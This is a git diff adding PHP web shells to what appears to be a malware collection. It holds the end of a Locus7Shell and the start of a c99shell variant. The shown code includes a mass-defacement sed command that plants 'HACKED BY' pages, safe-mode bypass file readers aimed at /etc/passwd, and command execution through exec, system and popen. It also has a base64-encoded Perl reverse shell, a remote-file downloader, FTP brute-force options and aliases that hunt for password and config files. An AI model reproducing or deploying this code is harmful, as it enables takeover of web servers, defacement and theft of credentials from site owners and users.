+                    <OPTION VALUE="sed -i -e 's/<html>/<div style=\'position\:absolute\;width\:2000px\;height\:2000px\;background-color\:black\'><br><br><br><br>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<img src=\'http://img244.imageshack.us/img244/6663/locus7sgm8.jpg\'><br><font size=\'10\' color=\'green\'>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<font size=\'10\' color=\'green\'>HACKED BY <a href=\'http\:\/\/locus7s.com\'>LOCUS7S<\/a><\/font><\/div><meta http-equiv=\'refresh\' content=\'5\\;url=http\:\/\/locus7s.com\'>/g' index.*">index.* Mass Defacement
+                  </SELECT> 
+        <input type=hidden name="cmd_txt" value="1"> 
+        &nbsp; 
+        <input type=submit name=submit value="Execute"> 
+          <br> 
+        Warning. Kernel may be alerted using higher levels </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
+      <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type="hidden" name="client" value="firefox-a"> 
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
+      <input type="hidden" name="hl" value="en"> 
+      <input type="hidden" name="hs" value="b7p"> 
+      <input type=submit name="btnG" VALUE="Search"> 
+    </form></center> 
+    </td> 
+</tr></TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Php Safe-Mode Bypass (Read Files) 
+    </div><br> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
+       
+       
+       
+            
+       
+       
+      <? 
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    } 
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+} 
+     
+    ?> 
+     
+    <? 
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+} 
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+} 
+
+?> 
+
+          <br> 
+      </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
+      <div align="center"><br> 
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
+
+    </form></center> 
+    </td> 
+</tr></TABLE> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ x2300 Locus7Shell v. <?php echo $shver; ?> <a href="http://www.locus7s.com/"><u><b>Modded by</b></u></a> #!physx^  | <a href="http://www.locus7s.com">www.LOCUS7S.com</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> 
+</body></html><?php chdir($lastdir); c99shexit(); ?> 
\ No newline at end of file
diff --git a/xakep-shells/PHP/c2007.php.php.txt b/xakep-shells/PHP/c2007.php.php.txt
new file mode 100644
index 0000000..75e5725
--- /dev/null
+++ b/xakep-shells/PHP/c2007.php.php.txt
@@ -0,0 +1,3299 @@
+<?php 
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.0 pre-release build #16"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied"; 
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server 
+$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>C99 Modified By Psych0 </b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ "html"=>array("html","htm","shtml"), 
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
+ "exe"=>array("sh","install","bat","cmd"), 
+ "ini"=>array("ini","inf"), 
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
+ "sdb"=>array("sdb"), 
+ "phpsess"=>array("sess"), 
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
+); 
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,"r"); 
+   while(!feof($fp)) 
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
+  array("config.php",1) // example 
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range("a","z"); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = "c99";  // default password for binding 
+$bindport_port = "31373"; // default port for binding 
+$bc_port = "31373"; // default port for back-connect 
+$datapipe_localport = "8081"; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+// Command-aliases 
+if (!$win) 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "ls -la"), 
+  array("find all suid files", "find / -type f -perm -04000 -ls"), 
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
+  array("find all sgid files", "find / -type f -perm -02000 -ls"), 
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
+  array("find config.inc.php files", "find / -type f -name config.inc.php"), 
+  array("find config* files", "find / -type f -name \"config*\""), 
+  array("find config* files in current dir", "find . -type f -name \"config*\""), 
+  array("find all writable folders and files", "find / -perm -2 -ls"), 
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
+  array("find all service.pwd files", "find / -type f -name service.pwd"), 
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
+  array("find all .bash_history files", "find / -type f -name .bash_history"), 
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
+  array("list file attributes on a Linux second extended file system", "lsattr -va"), 
+  array("show opened ports", "netstat -an | grep -i listen") 
+ ); 
+} 
+else 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "dir"), 
+  array("show opened ports", "netstat -an") 
+ ); 
+} 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"), 
+ array("<b>Tools</b>",$surl."act=tools&d=%d"), 
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"), 
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>Sec.</b>",$surl."act=security&d=%d"), 
+ array("<b>SQL</b>",$surl."act=sql&d=%d"), 
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"), 
+ array("<b>Update</b>",$surl."act=update&d=%d"), 
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"), 
+ array("<b>Self remove</b>",$surl."act=selfremove"), 
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") 
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   { 
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+} 
+function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+} 
+function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+} 
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o)) 
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink($o);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
